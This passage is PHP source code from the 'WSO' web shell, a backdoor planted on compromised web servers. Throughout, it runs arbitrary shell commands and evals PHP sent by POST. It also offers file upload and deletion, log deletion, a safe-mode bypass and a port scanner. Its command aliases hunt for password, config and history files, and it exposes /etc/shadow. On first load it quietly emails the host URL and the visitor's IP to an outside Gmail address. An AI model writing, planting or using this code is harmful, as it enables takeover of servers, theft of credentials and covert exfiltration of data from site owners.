@ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' ©\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], 